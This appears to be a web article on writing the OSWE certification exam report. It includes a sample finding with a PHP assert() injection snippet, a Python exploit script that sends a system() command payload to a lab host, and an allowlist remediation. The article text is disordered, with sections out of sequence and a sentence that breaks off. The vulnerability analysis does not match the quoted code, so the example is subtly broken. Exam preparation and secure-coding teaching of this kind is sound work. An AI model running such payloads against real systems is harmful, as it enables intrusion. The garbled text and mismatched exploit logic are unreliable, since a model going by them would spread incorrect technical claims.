
Exam Report: OSWE

Vulnerability Title: Unauthenticated Remote Code Execution via assert() Injection in core/logic.class.php

Severity: Critical

Code Location: /modules/core/logic.class.php, lines 88-94

Code Snippet:

  public function runCommand($user_input) {
      $result = "";
      // User input is evaluated as PHP code by assert()
      assert("$result = $user_input");
      return $result;
  }

Vulnerability Analysis: The runCommand() method takes user-controlled input from the cmd POST parameter. The assert() function evaluates the string as PHP code. Since no sanitization is applied, an attacker can break out of the string concatenation by injecting '.phpinfo().', leading to arbitrary code execution.

Exploit Script (exploit_assert_rce.py):

import requests

# Endpoint that passes the cmd POST parameter to runCommand()
target = "http://192.168.1.100/index.php?action=run"
payload = "'.system('cat /var/www/local.txt').'"
r = requests.post(target, data={"cmd": payload})
print(r.text) # Extracts local.txt

Proof: [Screenshot of exploit output showing local.txt hash: "OSWE8a3f..."]

Remediation: Remove assert() for dynamic code evaluation. Use a switch-case block or a whitelist of allowed commands. If dynamic logic is required, use a secure template engine or sandboxed evaluation environment.
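
A remediation section is stronger when it shows the fix next to the finding. The following is an added example, not code from the sample report or the application it describes: runCommand() rewritten as an allowlist dispatch, so the cmd value only selects a fixed handler and is never evaluated. The class name Logic, the command names and the handler methods are hypothetical.

```php
<?php
// Added example: allowlist dispatch replacing assert()-based evaluation.
// Class name, command names and handlers are hypothetical; the page does not list them.
final class Logic
{
    /** Permitted command names mapped to fixed handler methods (hypothetical set). */
    private const ALLOWED = [
        'status'  => 'cmdStatus',
        'version' => 'cmdVersion',
    ];

    public function runCommand($user_input): string
    {
        // Reject non-strings first (a POST body can deliver cmd as an array).
        if (!is_string($user_input)) {
            throw new InvalidArgumentException('cmd must be a string');
        }
        // Exact-match lookup: the input selects a handler, it is never evaluated.
        if (!array_key_exists($user_input, self::ALLOWED)) {
            throw new InvalidArgumentException('unknown command');
        }
        $handler = self::ALLOWED[$user_input];
        return $this->$handler();
    }

    private function cmdStatus(): string { return 'ok'; }
    private function cmdVersion(): string { return '1.0.0'; }
}

// Constructed inputs: one valid command and the injection string from the analysis.
$logic = new Logic();
foreach (['status', "'.phpinfo().'"] as $cmd) {
    try {
        echo $cmd, ' => ', $logic->runCommand($cmd), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo $cmd, ' => rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```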

The Offensive Security Web Expert (OSWE) certification is widely regarded as one of the most challenging and respected web application security credentials in the industry. Unlike multiple-choice exams or simple CTF competitions, the OSWE exam requires candidates to perform a white-box penetration test (source code review) on two complex web applications and then articulate their findings with surgical precision.

Here is the truth that many candidates learn the hard way: You do not fail the OSWE because you cannot hack the box. You fail the OSWE because you cannot write the report.

The OSWE exam report is not an afterthought; it is 50% of the exam. No matter how elegant your Python exploit script or how deep your static code analysis, if your report is unclear, incomplete, or fails to meet Offensive Security’s rigorous standards, you will see the dreaded "Fail" status.

This article is a deep dive into everything you need to know about the OSWE exam report. We will cover structure, common pitfalls, the "reproduction steps" nightmare, automation, and the exact checklist to use before you hit "submit."


For each vulnerability use this sub‑structure:

# OSWE Exam Report
**Student ID:** OS-XXXXX
**Date:** YYYY-MM-DD

You show a weakness but not the surrounding code. For instance, you find a SQL injection, but you don’t show the sanitization attempt (e.g., addslashes()) that you bypassed. The examiner needs to see why the developer’s fix failed.

Solution: Include 10 lines above and below the vulnerable code.

Before we discuss formatting, let's discuss psychology. Offensive Security exams (OSCP, OSWP, OSWE, OSEP) are unique because they simulate a real-world consultant’s workflow.

In the real world, a client pays you to find vulnerabilities. But if you cannot explain to the development team exactly how to trigger the bug and exactly where to fix it in the source code, your hack is useless.

The OSWE report is a white-box deliverable. This means:


This distinguishes OSWE from other certs. You must document how your automated exploit works.

  • Usage Output: Provide a screenshot of the script running successfully in your terminal.